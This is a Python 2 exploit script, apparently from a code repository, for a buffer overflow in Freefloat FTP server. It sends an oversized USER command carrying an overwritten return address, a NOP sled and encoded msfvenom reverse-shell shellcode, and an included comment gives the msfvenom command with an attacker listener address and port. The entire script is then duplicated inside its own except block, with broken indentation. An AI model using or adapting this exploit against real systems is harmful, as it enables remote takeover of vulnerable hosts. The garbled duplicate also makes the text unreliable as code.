dubs3c/freefloat-ftp-exploit.py

## freefloat-ftp-exploit.py
#!/usr/bin/env python2

import socket
import sys

# ============================================
# [!] Freefloat FTP server Buffer Overflow Exploit
# [+] Tested on Windows 7
# ============================================

if len(sys.argv) == 1:
	print("Usage: {script} <ip> <port>".format(script=sys.argv[0]))
	sys.exit()

badchars = "\x00\x0a\x0d"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.13.132 LPORT=4444 -f python -b \x00\x0a\x0d -e x86/shikata_ga_nai --smallest

shellcode =  ""
shellcode += "\xda\xd5\xbb\xd3\x95\x7b\xe6\xd9\x74\x24\xf4\x5a\x31"
shellcode += "\xc9\xb1\x52\x31\x5a\x17\x83\xea\xfc\x03\x89\x86\x99"
shellcode += "\x13\xd1\x41\xdf\xdc\x29\x92\x80\x55\xcc\xa3\x80\x02"
shellcode += "\x85\x94\x30\x40\xcb\x18\xba\x04\xff\xab\xce\x80\xf0"
shellcode += "\x1c\x64\xf7\x3f\x9c\xd5\xcb\x5e\x1e\x24\x18\x80\x1f"
shellcode += "\xe7\x6d\xc1\x58\x1a\x9f\x93\x31\x50\x32\x03\x35\x2c"
shellcode += "\x8f\xa8\x05\xa0\x97\x4d\xdd\xc3\xb6\xc0\x55\x9a\x18"
shellcode += "\xe3\xba\x96\x10\xfb\xdf\x93\xeb\x70\x2b\x6f\xea\x50"
shellcode += "\x65\x90\x41\x9d\x49\x63\x9b\xda\x6e\x9c\xee\x12\x8d"
shellcode += "\x21\xe9\xe1\xef\xfd\x7c\xf1\x48\x75\x26\xdd\x69\x5a"
shellcode += "\xb1\x96\x66\x17\xb5\xf0\x6a\xa6\x1a\x8b\x97\x23\x9d"
shellcode += "\x5b\x1e\x77\xba\x7f\x7a\x23\xa3\x26\x26\x82\xdc\x38"
shellcode += "\x89\x7b\x79\x33\x24\x6f\xf0\x1e\x21\x5c\x39\xa0\xb1"
shellcode += "\xca\x4a\xd3\x83\x55\xe1\x7b\xa8\x1e\x2f\x7c\xcf\x34"
shellcode += "\x97\x12\x2e\xb7\xe8\x3b\xf5\xe3\xb8\x53\xdc\x8b\x52"
shellcode += "\xa3\xe1\x59\xf4\xf3\x4d\x32\xb5\xa3\x2d\xe2\x5d\xa9"
shellcode += "\xa1\xdd\x7e\xd2\x6b\x76\x14\x29\xfc\xb9\x41\x3c\x78"
shellcode += "\x51\x90\x3e\x91\xfe\x1d\xd8\xfb\xee\x4b\x73\x94\x97"
shellcode += "\xd1\x0f\x05\x57\xcc\x6a\x05\xd3\xe3\x8b\xc8\x14\x89"
shellcode += "\x9f\xbd\xd4\xc4\xfd\x68\xea\xf2\x69\xf6\x79\x99\x69"
shellcode += "\x71\x62\x36\x3e\xd6\x54\x4f\xaa\xca\xcf\xf9\xc8\x16"
shellcode += "\x89\xc2\x48\xcd\x6a\xcc\x51\x80\xd7\xea\x41\x5c\xd7"
shellcode += "\xb6\x35\x30\x8e\x60\xe3\xf6\x78\xc3\x5d\xa1\xd7\x8d"
shellcode += "\x09\x34\x14\x0e\x4f\x39\x71\xf8\xaf\x88\x2c\xbd\xd0"
shellcode += "\x25\xb9\x49\xa9\x5b\x59\xb5\x60\xd8\x79\x54\xa0\x15"
shellcode += "\x12\xc1\x21\x94\x7f\xf2\x9c\xdb\x79\x71\x14\xa4\x7d"
shellcode += "\x69\x5d\xa1\x3a\x2d\x8e\xdb\x53\xd8\xb0\x48\x53\xc9"

eip = "\x03\xB5\x1C\x76" # 761CB503

buffer = "A" * 230 + eip + "\x90" * 20 + shellcode

host = sys.argv[1]
port = int(sys.argv[2])
s.settimeout(5)
try:
	print("[+] Connecting to {host}:{port}".format(host=host,port=port))
	s.connect((host, port))

	data = s.recv(1024)
	print(data)

	print("[+] Sending payload...")
	print("[+] Payload buffer size is {buffer} chars".format(buffer=len(buffer)))
	s.send("USER {buffer} \r\n".format(buffer=buffer))


	print("\n[+] Payload has been delivered!")
	s.close()

except Exception as e:
	print("[-] Could not send send payload to host. Error: {e}".format(e=e))
	#!/usr/bin/env python2

	import socket
	import sys

	# ============================================
	# [!] Freefloat FTP server Buffer Overflow Exploit
	# [+] Tested on Windows 7
	# ============================================

	if len(sys.argv) == 1:
	print("Usage: {script} <ip> <port>".format(script=sys.argv[0]))
	sys.exit()

	badchars = "\x00\x0a\x0d"


	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.13.132 LPORT=4444 -f python -b \x00\x0a\x0d -e x86/shikata_ga_nai --smallest

	shellcode = ""
	shellcode += "\xda\xd5\xbb\xd3\x95\x7b\xe6\xd9\x74\x24\xf4\x5a\x31"
	shellcode += "\xc9\xb1\x52\x31\x5a\x17\x83\xea\xfc\x03\x89\x86\x99"
	shellcode += "\x13\xd1\x41\xdf\xdc\x29\x92\x80\x55\xcc\xa3\x80\x02"
	shellcode += "\x85\x94\x30\x40\xcb\x18\xba\x04\xff\xab\xce\x80\xf0"
	shellcode += "\x1c\x64\xf7\x3f\x9c\xd5\xcb\x5e\x1e\x24\x18\x80\x1f"
	shellcode += "\xe7\x6d\xc1\x58\x1a\x9f\x93\x31\x50\x32\x03\x35\x2c"
	shellcode += "\x8f\xa8\x05\xa0\x97\x4d\xdd\xc3\xb6\xc0\x55\x9a\x18"
	shellcode += "\xe3\xba\x96\x10\xfb\xdf\x93\xeb\x70\x2b\x6f\xea\x50"
	shellcode += "\x65\x90\x41\x9d\x49\x63\x9b\xda\x6e\x9c\xee\x12\x8d"
	shellcode += "\x21\xe9\xe1\xef\xfd\x7c\xf1\x48\x75\x26\xdd\x69\x5a"
	shellcode += "\xb1\x96\x66\x17\xb5\xf0\x6a\xa6\x1a\x8b\x97\x23\x9d"
	shellcode += "\x5b\x1e\x77\xba\x7f\x7a\x23\xa3\x26\x26\x82\xdc\x38"
	shellcode += "\x89\x7b\x79\x33\x24\x6f\xf0\x1e\x21\x5c\x39\xa0\xb1"
	shellcode += "\xca\x4a\xd3\x83\x55\xe1\x7b\xa8\x1e\x2f\x7c\xcf\x34"
	shellcode += "\x97\x12\x2e\xb7\xe8\x3b\xf5\xe3\xb8\x53\xdc\x8b\x52"
	shellcode += "\xa3\xe1\x59\xf4\xf3\x4d\x32\xb5\xa3\x2d\xe2\x5d\xa9"
	shellcode += "\xa1\xdd\x7e\xd2\x6b\x76\x14\x29\xfc\xb9\x41\x3c\x78"
	shellcode += "\x51\x90\x3e\x91\xfe\x1d\xd8\xfb\xee\x4b\x73\x94\x97"
	shellcode += "\xd1\x0f\x05\x57\xcc\x6a\x05\xd3\xe3\x8b\xc8\x14\x89"
	shellcode += "\x9f\xbd\xd4\xc4\xfd\x68\xea\xf2\x69\xf6\x79\x99\x69"
	shellcode += "\x71\x62\x36\x3e\xd6\x54\x4f\xaa\xca\xcf\xf9\xc8\x16"
	shellcode += "\x89\xc2\x48\xcd\x6a\xcc\x51\x80\xd7\xea\x41\x5c\xd7"
	shellcode += "\xb6\x35\x30\x8e\x60\xe3\xf6\x78\xc3\x5d\xa1\xd7\x8d"
	shellcode += "\x09\x34\x14\x0e\x4f\x39\x71\xf8\xaf\x88\x2c\xbd\xd0"
	shellcode += "\x25\xb9\x49\xa9\x5b\x59\xb5\x60\xd8\x79\x54\xa0\x15"
	shellcode += "\x12\xc1\x21\x94\x7f\xf2\x9c\xdb\x79\x71\x14\xa4\x7d"
	shellcode += "\x69\x5d\xa1\x3a\x2d\x8e\xdb\x53\xd8\xb0\x48\x53\xc9"

	eip = "\x03\xB5\x1C\x76" # 761CB503

	buffer = "A" * 230 + eip + "\x90" * 20 + shellcode

	host = sys.argv[1]
	port = int(sys.argv[2])
	s.settimeout(5)
	try:
	print("[+] Connecting to {host}:{port}".format(host=host,port=port))
	s.connect((host, port))

	data = s.recv(1024)
	print(data)

	print("[+] Sending payload...")
	print("[+] Payload buffer size is {buffer} chars".format(buffer=len(buffer)))
	s.send("USER {buffer} \r\n".format(buffer=buffer))


	print("\n[+] Payload has been delivered!")
	s.close()

	except Exception as e:
	print("[-] Could not send send payload to host. Error: {e}".format(e=e))